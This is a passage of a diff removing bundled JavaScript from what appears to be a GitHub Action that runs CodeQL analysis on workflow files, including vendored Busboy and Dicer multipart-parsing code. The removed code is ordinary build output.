temp directory for database - var temp = process.env["RUNNER_TEMP"]; 
- if (temp === undefined) { - temp = "/tmp"; - } - var database_path = path.join(temp, "codeql-actions-db"); - var source_root = codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; - await runCommand(codeql, [ - "database", - "create", - "--language", - codeql.language, - "--source-root", - source_root, - database_path, - ]); - return database_path; -} -exports.codeqlDatabaseCreate = codeqlDatabaseCreate; -async function codeqlDatabaseAnalyze(codeql, database_path) { - var codeql_output = codeql.output || "codeql-actions.sarif"; - var cmd = [ - "database", - "analyze", - "--format", - "sarif-latest", - "--sarif-add-query-help", - "--output", - codeql_output, - ]; - if (codeql.packs !== undefined) { - cmd.push("--extension-packs", codeql.packs); - } - // remote pack or local pack - if (codeql.pack.startsWith("githubsecuritylab/")) { - var suite = codeql.pack + ":" + codeql.suite; - } - else { - // assume path - var suite = path.join(codeql.pack, codeql.suite); - cmd.push("--search-path", codeql.pack); - } - cmd.push(database_path, suite); - await runCommand(codeql, cmd); - return codeql_output; -} -exports.codeqlDatabaseAnalyze = codeqlDatabaseAnalyze; - - -/***/ }), - -/***/ 6144: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - var desc = Object.getOwnPropertyDescriptor(m, k); - if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { - desc = { enumerable: true, get: function() { return m[k]; } }; - } - Object.defineProperty(o, k2, desc); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? 
(function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.run = void 0; -const path = __importStar(__nccwpck_require__(1017)); -const core = __importStar(__nccwpck_require__(2186)); -const cql = __importStar(__nccwpck_require__(950)); -/** - * The main function for the action. - * @returns {Promise} Resolves when the action is complete. - */ -async function run() { - try { - // set up codeql - var codeql = await cql.newCodeQL(); - core.debug(`CodeQL CLI found at '${codeql.path}'`); - await cql.runCommand(codeql, ["version", "--format", "terse"]); - // check javascript support - var languages = await cql.runCommandJson(codeql, [ - "resolve", - "languages", - "--format", - "json", - ]); - if (!languages.hasOwnProperty("javascript")) { - core.setFailed("CodeQL javascript extractor not installed"); - throw new Error("CodeQL javascript extractor not installed"); - } - // download pack - core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - var pack_downloaded = await cql.downloadPack(codeql); - if (pack_downloaded === false) { - var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); - codeql.pack = path.join(action_path, "ql", "src"); - core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); - } - else { - core.info(`Pack downloaded '${codeql.pack}'`); - } - core.info("Creating CodeQL database..."); - var database_path = await cql.codeqlDatabaseCreate(codeql); - core.info("Running CodeQL analysis..."); - var sarif = await cql.codeqlDatabaseAnalyze(codeql, 
database_path); - core.info(`SARIF results: '${sarif}'`); - core.setOutput("sarif", sarif); - core.info("Finished CodeQL analysis"); - } - catch (error) { - // Fail the workflow run if an error occurs - if (error instanceof Error) - core.setFailed(error.message); - } -} -exports.run = run; -// eslint-disable-next-line @typescript-eslint/no-floating-promises -run(); - - -/***/ }), - -/***/ 9491: -/***/ ((module) => { - -"use strict"; -module.exports = require("assert"); - -/***/ }), - -/***/ 852: -/***/ ((module) => { - -"use strict"; -module.exports = require("async_hooks"); - -/***/ }), - -/***/ 4300: -/***/ ((module) => { - -"use strict"; -module.exports = require("buffer"); - -/***/ }), - -/***/ 2081: -/***/ ((module) => { - -"use strict"; -module.exports = require("child_process"); - -/***/ }), - -/***/ 6206: -/***/ ((module) => { - -"use strict"; -module.exports = require("console"); - -/***/ }), - -/***/ 6113: -/***/ ((module) => { - -"use strict"; -module.exports = require("crypto"); - -/***/ }), - -/***/ 7643: -/***/ ((module) => { - -"use strict"; -module.exports = require("diagnostics_channel"); - -/***/ }), - -/***/ 2361: -/***/ ((module) => { - -"use strict"; -module.exports = require("events"); - -/***/ }), - -/***/ 7147: -/***/ ((module) => { - -"use strict"; -module.exports = require("fs"); - -/***/ }), - -/***/ 3685: -/***/ ((module) => { - -"use strict"; -module.exports = require("http"); - -/***/ }), - -/***/ 5158: -/***/ ((module) => { - -"use strict"; -module.exports = require("http2"); - -/***/ }), - -/***/ 5687: -/***/ ((module) => { - -"use strict"; -module.exports = require("https"); - -/***/ }), - -/***/ 1808: -/***/ ((module) => { - -"use strict"; -module.exports = require("net"); - -/***/ }), - -/***/ 5673: -/***/ ((module) => { - -"use strict"; -module.exports = require("node:events"); - -/***/ }), - -/***/ 4492: -/***/ ((module) => { - -"use strict"; -module.exports = require("node:stream"); - -/***/ }), - -/***/ 7261: -/***/ ((module) 
=> { - -"use strict"; -module.exports = require("node:util"); - -/***/ }), - -/***/ 2037: -/***/ ((module) => { - -"use strict"; -module.exports = require("os"); - -/***/ }), - -/***/ 1017: -/***/ ((module) => { - -"use strict"; -module.exports = require("path"); - -/***/ }), - -/***/ 4074: -/***/ ((module) => { - -"use strict"; -module.exports = require("perf_hooks"); - -/***/ }), - -/***/ 3477: -/***/ ((module) => { - -"use strict"; -module.exports = require("querystring"); - -/***/ }), - -/***/ 2781: -/***/ ((module) => { - -"use strict"; -module.exports = require("stream"); - -/***/ }), - -/***/ 5356: -/***/ ((module) => { - -"use strict"; -module.exports = require("stream/web"); - -/***/ }), - -/***/ 1576: -/***/ ((module) => { - -"use strict"; -module.exports = require("string_decoder"); - -/***/ }), - -/***/ 9512: -/***/ ((module) => { - -"use strict"; -module.exports = require("timers"); - -/***/ }), - -/***/ 4404: -/***/ ((module) => { - -"use strict"; -module.exports = require("tls"); - -/***/ }), - -/***/ 7310: -/***/ ((module) => { - -"use strict"; -module.exports = require("url"); - -/***/ }), - -/***/ 3837: -/***/ ((module) => { - -"use strict"; -module.exports = require("util"); - -/***/ }), - -/***/ 9830: -/***/ ((module) => { - -"use strict"; -module.exports = require("util/types"); - -/***/ }), - -/***/ 1267: -/***/ ((module) => { - -"use strict"; -module.exports = require("worker_threads"); - -/***/ }), - -/***/ 9796: -/***/ ((module) => { - -"use strict"; -module.exports = require("zlib"); - -/***/ }), - -/***/ 2960: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const WritableStream = (__nccwpck_require__(4492).Writable) -const inherits = (__nccwpck_require__(7261).inherits) - -const StreamSearch = __nccwpck_require__(1142) - -const PartStream = __nccwpck_require__(1620) -const HeaderParser = __nccwpck_require__(2032) - -const DASH = 45 -const B_ONEDASH = Buffer.from('-') -const B_CRLF = 
Buffer.from('\r\n') -const EMPTY_FN = function () {} - -function Dicer (cfg) { - if (!(this instanceof Dicer)) { return new Dicer(cfg) } - WritableStream.call(this, cfg) - - if (!cfg || (!cfg.headerFirst && typeof cfg.boundary !== 'string')) { throw new TypeError('Boundary required') } - - if (typeof cfg.boundary === 'string') { this.setBoundary(cfg.boundary) } else { this._bparser = undefined } - - this._headerFirst = cfg.headerFirst - - this._dashes = 0 - this._parts = 0 - this._finished = false - this._realFinish = false - this._isPreamble = true - this._justMatched = false - this._firstWrite = true - this._inHeader = true - this._part = undefined - this._cb = undefined - this._ignoreData = false - this._partOpts = { highWaterMark: cfg.partHwm } - this._pause = false - - const self = this - this._hparser = new HeaderParser(cfg) - this._hparser.on('header', function (header) { - self._inHeader = false - self._part.emit('header', header) - }) -} -inherits(Dicer, WritableStream) - -Dicer.prototype.emit = function (ev) { - if (ev === 'finish' && !this._realFinish) { - if (!this._finished) { - const self = this - process.nextTick(function () { - self.emit('error', new Error('Unexpected end of multipart data')) - if (self._part && !self._ignoreData) { - const type = (self._isPreamble ? 'Preamble' : 'Part') - self._part.emit('error', new Error(type + ' terminated early due to unexpected end of multipart data')) - self._part.push(null) - process.nextTick(function () { - self._realFinish = true - self.emit('finish') - self._realFinish = false - }) - return - } - self._realFinish = true - self.emit('finish') - self._realFinish = false - }) - } - } else { WritableStream.prototype.emit.apply(this, arguments) } -} - -Dicer.prototype._write = function (data, encoding, cb) { - // ignore unexpected data (e.g. 
extra trailer data after finished) - if (!this._hparser && !this._bparser) { return cb() } - - if (this._headerFirst && this._isPreamble) { - if (!this._part) { - this._part = new PartStream(this._partOpts) - if (this._events.preamble) { this.emit('preamble', this._part) } else { this._ignore() } - } - const r = this._hparser.push(data) - if (!this._inHeader && r !== undefined && r < data.length) { data = data.slice(r) } else { return cb() } - } - - // allows for "easier" testing - if (this._firstWrite) { - this._bparser.push(B_CRLF) - this._firstWrite = false - } - - this._bparser.push(data) - - if (this._pause) { this._cb = cb } else { cb() } -} - -Dicer.prototype.reset = function () { - this._part = undefined - this._bparser = undefined - this._hparser = undefined -} - -Dicer.prototype.setBoundary = function (boundary) { - const self = this - this._bparser = new StreamSearch('\r\n--' + boundary) - this._bparser.on('info', function (isMatch, data, start, end) { - self._oninfo(isMatch, data, start, end) - }) -} - -Dicer.prototype._ignore = function () { - if (this._part && !this._ignoreData) { - this._ignoreData = true - this._part.on('error', EMPTY_FN) - // we must perform some kind of read on the stream even though we are - // ignoring the data, otherwise node's Readable stream will not emit 'end' - // after pushing null to the stream - this._part.resume() - } -} - -Dicer.prototype._oninfo = function (isMatch, data, start, end) { - let buf; const self = this; let i = 0; let r; let shouldWriteMore = true - - if (!this._part && this._justMatched && data) { - while (this._dashes < 2 && (start + i) < end) { - if (data[start + i] === DASH) { - ++i - ++this._dashes - } else { - if (this._dashes) { buf = B_ONEDASH } - this._dashes = 0 - break - } - } - if (this._dashes === 2) { - if ((start + i) < end && this._events.trailer) { this.emit('trailer', data.slice(start + i, end)) } - this.reset() - this._finished = true - // no more parts will be added - if (self._parts 
=== 0) { - self._realFinish = true - self.emit('finish') - self._realFinish = false - } - } - if (this._dashes) { return } - } - if (this._justMatched) { this._justMatched = false } - if (!this._part) { - this._part = new PartStream(this._partOpts) - this._part._read = function (n) { - self._unpause() - } - if (this._isPreamble && this._events.preamble) { this.emit('preamble', this._part) } else if (this._isPreamble !== true && this._events.part) { this.emit('part', this._part) } else { this._ignore() } - if (!this._isPreamble) { this._inHeader = true } - } - if (data && start < end && !this._ignoreData) { - if (this._isPreamble || !this._inHeader) { - if (buf) { shouldWriteMore = this._part.push(buf) } - shouldWriteMore = this._part.push(data.slice(start, end)) - if (!shouldWriteMore) { this._pause = true } - } else if (!this._isPreamble && this._inHeader) { - if (buf) { this._hparser.push(buf) } - r = this._hparser.push(data.slice(start, end)) - if (!this._inHeader && r !== undefined && r < end) { this._oninfo(false, data, start + r, end) } - } - } - if (isMatch) { - this._hparser.reset() - if (this._isPreamble) { this._isPreamble = false } else { - if (start !== end) { - ++this._parts - this._part.on('end', function () { - if (--self._parts === 0) { - if (self._finished) { - self._realFinish = true - self.emit('finish') - self._realFinish = false - } else { - self._unpause() - } - } - }) - } - } - this._part.push(null) - this._part = undefined - this._ignoreData = false - this._justMatched = true - this._dashes = 0 - } -} - -Dicer.prototype._unpause = function () { - if (!this._pause) { return } - - this._pause = false - if (this._cb) { - const cb = this._cb - this._cb = undefined - cb() - } -} - -module.exports = Dicer - - -/***/ }), - -/***/ 2032: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const EventEmitter = (__nccwpck_require__(5673).EventEmitter) -const inherits = (__nccwpck_require__(7261).inherits) -const 
getLimit = __nccwpck_require__(1467) - -const StreamSearch = __nccwpck_require__(1142) - -const B_DCRLF = Buffer.from('\r\n\r\n') -const RE_CRLF = /\r\n/g -const RE_HDR = /^([^:]+):[ \t]?([\x00-\xFF]+)?$/ // eslint-disable-line no-control-regex - -function HeaderParser (cfg) { - EventEmitter.call(this) - - cfg = cfg || {} - const self = this - this.nread = 0 - this.maxed = false - this.npairs = 0 - this.maxHeaderPairs = getLimit(cfg, 'maxHeaderPairs', 2000) - this.maxHeaderSize = getLimit(cfg, 'maxHeaderSize', 80 * 1024) - this.buffer = '' - this.header = {} - this.finished = false - this.ss = new StreamSearch(B_DCRLF) - this.ss.on('info', function (isMatch, data, start, end) { - if (data && !self.maxed) { - if (self.nread + end - start >= self.maxHeaderSize) { - end = self.maxHeaderSize - self.nread + start - self.nread = self.maxHeaderSize - self.maxed = true - } else { self.nread += (end - start) } - - self.buffer += data.toString('binary', start, end) - } - if (isMatch) { self._finish() } - }) -} -inherits(HeaderParser, EventEmitter) - -HeaderParser.prototype.push = function (data) { - const r = this.ss.push(data) - if (this.finished) { return r } -} - -HeaderParser.prototype.reset = function () { - this.finished = false - this.buffer = '' - this.header = {} - this.ss.reset() -} - -HeaderParser.prototype._finish = function () { - if (this.buffer) { this._parseHeader() } - this.ss.matches = this.ss.maxMatches - const header = this.header - this.header = {} - this.buffer = '' - this.finished = true - this.nread = this.npairs = 0 - this.maxed = false - this.emit('header', header) -} - -HeaderParser.prototype._parseHeader = function () { - if (this.npairs === this.maxHeaderPairs) { return } - - const lines = this.buffer.split(RE_CRLF) - const len = lines.length - let m, h - - for (var i = 0; i < len; ++i) { // eslint-disable-line no-var - if (lines[i].length === 0) { continue } - if (lines[i][0] === '\t' || lines[i][0] === ' ') { - // folded header content - // 
RFC2822 says to just remove the CRLF and not the whitespace following - // it, so we follow the RFC and include the leading whitespace ... - if (h) { - this.header[h][this.header[h].length - 1] += lines[i] - continue - } - } - - const posColon = lines[i].indexOf(':') - if ( - posColon === -1 || - posColon === 0 - ) { - return - } - m = RE_HDR.exec(lines[i]) - h = m[1].toLowerCase() - this.header[h] = this.header[h] || [] - this.header[h].push((m[2] || '')) - if (++this.npairs === this.maxHeaderPairs) { break } - } -} - -module.exports = HeaderParser - - -/***/ }), - -/***/ 1620: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const inherits = (__nccwpck_require__(7261).inherits) -const ReadableStream = (__nccwpck_require__(4492).Readable) - -function PartStream (opts) { - ReadableStream.call(this, opts) -} -inherits(PartStream, ReadableStream) - -PartStream.prototype._read = function (n) {} - -module.exports = PartStream - - -/***/ }), - -/***/ 1142: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -/** - * Copyright Brian White. All rights reserved. - * - * @see https://github.com/mscdex/streamsearch - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to - * deal in the Software without restriction, including without limitation the - * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or - * sell copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. 
- * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING - * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS - * IN THE SOFTWARE. - * - * Based heavily on the Streaming Boyer-Moore-Horspool C++ implementation - * by Hongli Lai at: https://github.com/FooBarWidget/boyer-moore-horspool - */ -const EventEmitter = (__nccwpck_require__(5673).EventEmitter) -const inherits = (__nccwpck_require__(7261).inherits) - -function SBMH (needle) { - if (typeof needle === 'string') { - needle = Buffer.from(needle) - } - - if (!Buffer.isBuffer(needle)) { - throw new TypeError('The needle has to be a String or a Buffer.') - } - - const needleLength = needle.length - - if (needleLength === 0) { - throw new Error('The needle cannot be an empty String/Buffer.') - } - - if (needleLength > 256) { - throw new Error('The needle cannot have a length bigger than 256.') - } - - this.maxMatches = Infinity - this.matches = 0 - - this._occ = new Array(256) - .fill(needleLength) // Initialize occurrence table. - this._lookbehind_size = 0 - this._needle = needle - this._bufpos = 0 - - this._lookbehind = Buffer.alloc(needleLength) - - // Populate occurrence table with analysis of the needle, - // ignoring last letter. 
- for (var i = 0; i < needleLength - 1; ++i) { // eslint-disable-line no-var - this._occ[needle[i]] = needleLength - 1 - i - } -} -inherits(SBMH, EventEmitter) - -SBMH.prototype.reset = function () { - this._lookbehind_size = 0 - this.matches = 0 - this._bufpos = 0 -} - -SBMH.prototype.push = function (chunk, pos) { - if (!Buffer.isBuffer(chunk)) { - chunk = Buffer.from(chunk, 'binary') - } - const chlen = chunk.length - this._bufpos = pos || 0 - let r - while (r !== chlen && this.matches < this.maxMatches) { r = this._sbmh_feed(chunk) } - return r -} - -SBMH.prototype._sbmh_feed = function (data) { - const len = data.length - const needle = this._needle - const needleLength = needle.length - const lastNeedleChar = needle[needleLength - 1] - - // Positive: points to a position in `data` - // pos == 3 points to data[3] - // Negative: points to a position in the lookbehind buffer - // pos == -2 points to lookbehind[lookbehind_size - 2] - let pos = -this._lookbehind_size - let ch - - if (pos < 0) { - // Lookbehind buffer is not empty. Perform Boyer-Moore-Horspool - // search with character lookup code that considers both the - // lookbehind buffer and the current round's haystack data. - // - // Loop until - // there is a match. - // or until - // we've moved past the position that requires the - // lookbehind buffer. In this case we switch to the - // optimized loop. - // or until - // the character to look at lies outside the haystack. - while (pos < 0 && pos <= len - needleLength) { - ch = this._sbmh_lookup_char(data, pos + needleLength - 1) - - if ( - ch === lastNeedleChar && - this._sbmh_memcmp(data, pos, needleLength - 1) - ) { - this._lookbehind_size = 0 - ++this.matches - this.emit('info', true) - - return (this._bufpos = pos + needleLength) - } - pos += this._occ[ch] - } - - // No match. - - if (pos < 0) { - // There's too few data for Boyer-Moore-Horspool to run, - // so let's use a different algorithm to skip as much as - // we can. 
- // Forward pos until - // the trailing part of lookbehind + data - // looks like the beginning of the needle - // or until - // pos == 0 - while (pos < 0 && !this._sbmh_memcmp(data, pos, len - pos)) { ++pos } - } - - if (pos >= 0) { - // Discard lookbehind buffer. - this.emit('info', false, this._lookbehind, 0, this._lookbehind_size) - this._lookbehind_size = 0 - } else { - // Cut off part of the lookbehind buffer that has - // been processed and append the entire haystack - // into it. - const bytesToCutOff = this._lookbehind_size + pos - if (bytesToCutOff > 0) { - // The cut off data is guaranteed not to contain the needle. - this.emit('info', false, this._lookbehind, 0, bytesToCutOff) - } - - this._lookbehind.copy(this._lookbehind, 0, bytesToCutOff, - this._lookbehind_size - bytesToCutOff) - this._lookbehind_size -= bytesToCutOff - - data.copy(this._lookbehind, this._lookbehind_size) - this._lookbehind_size += len - - this._bufpos = len - return len - } - } - - pos += (pos >= 0) * this._bufpos - - // Lookbehind buffer is now empty. We only need to check if the - // needle is in the haystack. - if (data.indexOf(needle, pos) !== -1) { - pos = data.indexOf(needle, pos) - ++this.matches - if (pos > 0) { this.emit('info', true, data, this._bufpos, pos) } else { this.emit('info', true) } - - return (this._bufpos = pos + needleLength) - } else { - pos = len - needleLength - } - - // There was no match. If there's trailing haystack data that we cannot - // match yet using the Boyer-Moore-Horspool algorithm (because the trailing - // data is less than the needle size) then match using a modified - // algorithm that starts matching from the beginning instead of the end. - // Whatever trailing data is left after running this algorithm is added to - // the lookbehind buffer. 
- while ( - pos < len && - ( - data[pos] !== needle[0] || - ( - (Buffer.compare( - data.subarray(pos, pos + len - pos), - needle.subarray(0, len - pos) - ) !== 0) - ) - ) - ) { - ++pos - } - if (pos < len) { - data.copy(this._lookbehind, 0, pos, pos + (len - pos)) - this._lookbehind_size = len - pos - } - - // Everything until pos is guaranteed not to contain needle data. - if (pos > 0) { this.emit('info', false, data, this._bufpos, pos < len ? pos : len) } - - this._bufpos = len - return len -} - -SBMH.prototype._sbmh_lookup_char = function (data, pos) { - return (pos < 0) - ? this._lookbehind[this._lookbehind_size + pos] - : data[pos] -} - -SBMH.prototype._sbmh_memcmp = function (data, pos, len) { - for (var i = 0; i < len; ++i) { // eslint-disable-line no-var - if (this._sbmh_lookup_char(data, pos + i) !== this._needle[i]) { return false } - } - return true -} - -module.exports = SBMH - - -/***/ }), - -/***/ 727: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const WritableStream = (__nccwpck_require__(4492).Writable) -const { inherits } = __nccwpck_require__(7261) -const Dicer = __nccwpck_require__(2960) - -const MultipartParser = __nccwpck_require__(2183) -const UrlencodedParser = __nccwpck_require__(8306) -const parseParams = __nccwpck_require__(1854) - -function Busboy (opts) { - if (!(this instanceof Busboy)) { return new Busboy(opts) } - - if (typeof opts !== 'object') { - throw new TypeError('Busboy expected an options-Object.') - } - if (typeof opts.headers !== 'object') { - throw new TypeError('Busboy expected an options-Object with headers-attribute.') - } - if (typeof opts.headers['content-type'] !== 'string') { - throw new TypeError('Missing Content-Type-header.') - } - - const { - headers, - ...streamOptions - } = opts - - this.opts = { - autoDestroy: false, - ...streamOptions - } - WritableStream.call(this, this.opts) - - this._done = false - this._parser = this.getParserByHeaders(headers) - 
this._finished = false -} -inherits(Busboy, WritableStream) - -Busboy.prototype.emit = function (ev) { - if (ev === 'finish') { - if (!this._done) { - this._parser?.end() - return - } else if (this._finished) { - return - } - this._finished = true - } - WritableStream.prototype.emit.apply(this, arguments) -} - -Busboy.prototype.getParserByHeaders = function (headers) { - const parsed = parseParams(headers['content-type']) - - const cfg = { - defCharset: this.opts.defCharset, - fileHwm: this.opts.fileHwm, - headers, - highWaterMark: this.opts.highWaterMark, - isPartAFile: this.opts.isPartAFile, - limits: this.opts.limits, - parsedConType: parsed, - preservePath: this.opts.preservePath - } - - if (MultipartParser.detect.test(parsed[0])) { - return new MultipartParser(this, cfg) - } - if (UrlencodedParser.detect.test(parsed[0])) { - return new UrlencodedParser(this, cfg) - } - throw new Error('Unsupported Content-Type.') -} - -Busboy.prototype._write = function (chunk, encoding, cb) { - this._parser.write(chunk, cb) -} - -module.exports = Busboy -module.exports["default"] = Busboy -module.exports.Busboy = Busboy - -module.exports.Dicer = Dicer - - -/***/ }), - -/***/ 2183: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -// TODO: -// * support 1 nested multipart level -// (see second multipart example here: -// http://www.w3.org/TR/html401/interact/forms.html#didx-multipartform-data) -// * support limits.fieldNameSize -// -- this will require modifications to utils.parseParams - -const { Readable } = __nccwpck_require__(4492) -const { inherits } = __nccwpck_require__(7261) - -const Dicer = __nccwpck_require__(2960) - -const parseParams = __nccwpck_require__(1854) -const decodeText = __nccwpck_require__(4619) -const basename = __nccwpck_require__(8647) -const getLimit = __nccwpck_require__(1467) - -const RE_BOUNDARY = /^boundary$/i -const RE_FIELD = /^form-data$/i -const RE_CHARSET = /^charset$/i -const RE_FILENAME = 
/^filename$/i -const RE_NAME = /^name$/i - -Multipart.detect = /^multipart\/form-data/i -function Multipart (boy, cfg) { - let i - let len - const self = this - let boundary - const limits = cfg.limits - const isPartAFile = cfg.isPartAFile || ((fieldName, contentType, fileName) => (contentType === 'application/octet-stream' || fileName !== undefined)) - const parsedConType = cfg.parsedConType || [] - const defCharset = cfg.defCharset || 'utf8' - const preservePath = cfg.preservePath - const fileOpts = { highWaterMark: cfg.fileHwm } - - for (i = 0, len = parsedConType.length; i < len; ++i) { - if (Array.isArray(parsedConType[i]) && - RE_BOUNDARY.test(parsedConType[i][0])) { - boundary = parsedConType[i][1] - break - } - } - - function checkFinished () { - if (nends === 0 && finished && !boy._done) { - finished = false - self.end() - } - } - - if (typeof boundary !== 'string') { throw new Error('Multipart: Boundary not found') } - - const fieldSizeLimit = getLimit(limits, 'fieldSize', 1 * 1024 * 1024) - const fileSizeLimit = getLimit(limits, 'fileSize', Infinity) - const filesLimit = getLimit(limits, 'files', Infinity) - const fieldsLimit = getLimit(limits, 'fields', Infinity) - const partsLimit = getLimit(limits, 'parts', Infinity) - const headerPairsLimit = getLimit(limits, 'headerPairs', 2000) - const headerSizeLimit = getLimit(limits, 'headerSize', 80 * 1024) - - let nfiles = 0 - let nfields = 0 - let nends = 0 - let curFile - let curField - let finished = false - - this._needDrain = false - this._pause = false - this._cb = undefined - this._nparts = 0 - this._boy = boy - - const parserCfg = { - boundary, - maxHeaderPairs: headerPairsLimit, - maxHeaderSize: headerSizeLimit, - partHwm: fileOpts.highWaterMark, - highWaterMark: cfg.highWaterMark - } - - this.parser = new Dicer(parserCfg) - this.parser.on('drain', function () { - self._needDrain = false - if (self._cb && !self._pause) { - const cb = self._cb - self._cb = undefined - cb() - } - }).on('part', function 
onPart (part) { - if (++self._nparts > partsLimit) { - self.parser.removeListener('part', onPart) - self.parser.on('part', skipPart) - boy.hitPartsLimit = true - boy.emit('partsLimit') - return skipPart(part) - } - - // hack because streams2 _always_ doesn't emit 'end' until nextTick, so let - // us emit 'end' early since we know the part has ended if we are already - // seeing the next part - if (curField) { - const field = curField - field.emit('end') - field.removeAllListeners('end') - } - - part.on('header', function (header) { - let contype - let fieldname - let parsed - let charset - let encoding - let filename - let nsize = 0 - - if (header['content-type']) { - parsed = parseParams(header['content-type'][0]) - if (parsed[0]) { - contype = parsed[0].toLowerCase() - for (i = 0, len = parsed.length; i < len; ++i) { - if (RE_CHARSET.test(parsed[i][0])) { - charset = parsed[i][1].toLowerCase() - break - } - } - } - } - - if (contype === undefined) { contype = 'text/plain' } - if (charset === undefined) { charset = defCharset } - - if (header['content-disposition']) { - parsed = parseParams(header['content-disposition'][0]) - if (!RE_FIELD.test(parsed[0])) { return skipPart(part) } - for (i = 0, len = parsed.length; i < len; ++i) { - if (RE_NAME.test(parsed[i][0])) { - fieldname = parsed[i][1] - } else if (RE_FILENAME.test(parsed[i][0])) { - filename = parsed[i][1] - if (!preservePath) { filename = basename(filename) } - } - } - } else { return skipPart(part) } - - if (header['content-transfer-encoding']) { encoding = header['content-transfer-encoding'][0].toLowerCase() } else { encoding = '7bit' } - - let onData, - onEnd - - if (isPartAFile(fieldname, contype, filename)) { - // file/binary field - if (nfiles === filesLimit) { - if (!boy.hitFilesLimit) { - boy.hitFilesLimit = true - boy.emit('filesLimit') - } - return skipPart(part) - } - - ++nfiles - - if (!boy._events.file) { - self.parser._ignore() - return - } - - ++nends - const file = new 
FileStream(fileOpts) - curFile = file - file.on('end', function () { - --nends - self._pause = false - checkFinished() - if (self._cb && !self._needDrain) { - const cb = self._cb - self._cb = undefined - cb() - } - }) - file._read = function (n) { - if (!self._pause) { return } - self._pause = false - if (self._cb && !self._needDrain) { - const cb = self._cb - self._cb = undefined - cb() - } - } - boy.emit('file', fieldname, file, filename, encoding, contype) - - onData = function (data) { - if ((nsize += data.length) > fileSizeLimit) { - const extralen = fileSizeLimit - nsize + data.length - if (extralen > 0) { file.push(data.slice(0, extralen)) } - file.truncated = true - file.bytesRead = fileSizeLimit - part.removeAllListeners('data') - file.emit('limit') - return - } else if (!file.push(data)) { self._pause = true } - - file.bytesRead = nsize - } - - onEnd = function () { - curFile = undefined - file.push(null) - } - } else { - // non-file field - if (nfields === fieldsLimit) { - if (!boy.hitFieldsLimit) { - boy.hitFieldsLimit = true - boy.emit('fieldsLimit') - } - return skipPart(part) - } - - ++nfields - ++nends - let buffer = '' - let truncated = false - curField = part - - onData = function (data) { - if ((nsize += data.length) > fieldSizeLimit) { - const extralen = (fieldSizeLimit - (nsize - data.length)) - buffer += data.toString('binary', 0, extralen) - truncated = true - part.removeAllListeners('data') - } else { buffer += data.toString('binary') } - } - - onEnd = function () { - curField = undefined - if (buffer.length) { buffer = decodeText(buffer, 'binary', charset) } - boy.emit('field', fieldname, buffer, false, truncated, encoding, contype) - --nends - checkFinished() - } - } - - /* As of node@2efe4ab761666 (v0.10.29+/v0.11.14+), busboy had become - broken. Streams2/streams3 is a huge black box of confusion, but - somehow overriding the sync state seems to fix things again (and still - seems to work for previous node versions). 
- */ - part._readableState.sync = false - - part.on('data', onData) - part.on('end', onEnd) - }).on('error', function (err) { - if (curFile) { curFile.emit('error', err) } - }) - }).on('error', function (err) { - boy.emit('error', err) - }).on('finish', function () { - finished = true - checkFinished() - }) -} - -Multipart.prototype.write = function (chunk, cb) { - const r = this.parser.write(chunk) - if (r && !this._pause) { - cb() - } else { - this._needDrain = !r - this._cb = cb - } -} - -Multipart.prototype.end = function () { - const self = this - - if (self.parser.writable) { - self.parser.end() - } else if (!self._boy._done) { - process.nextTick(function () { - self._boy._done = true - self._boy.emit('finish') - }) - } -} - -function skipPart (part) { - part.resume() -} - -function FileStream (opts) { - Readable.call(this, opts) - - this.bytesRead = 0 - - this.truncated = false -} - -inherits(FileStream, Readable) - -FileStream.prototype._read = function (n) {} - -module.exports = Multipart - - -/***/ }), - -/***/ 8306: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const Decoder = __nccwpck_require__(7100) -const decodeText = __nccwpck_require__(4619) -const getLimit = __nccwpck_require__(1467) - -const RE_CHARSET = /^charset$/i - -UrlEncoded.detect = /^application\/x-www-form-urlencoded/i -function UrlEncoded (boy, cfg) { - const limits = cfg.limits - const parsedConType = cfg.parsedConType - this.boy = boy - - this.fieldSizeLimit = getLimit(limits, 'fieldSize', 1 * 1024 * 1024) - this.fieldNameSizeLimit = getLimit(limits, 'fieldNameSize', 100) - this.fieldsLimit = getLimit(limits, 'fields', Infinity) - - let charset - for (var i = 0, len = parsedConType.length; i < len; ++i) { // 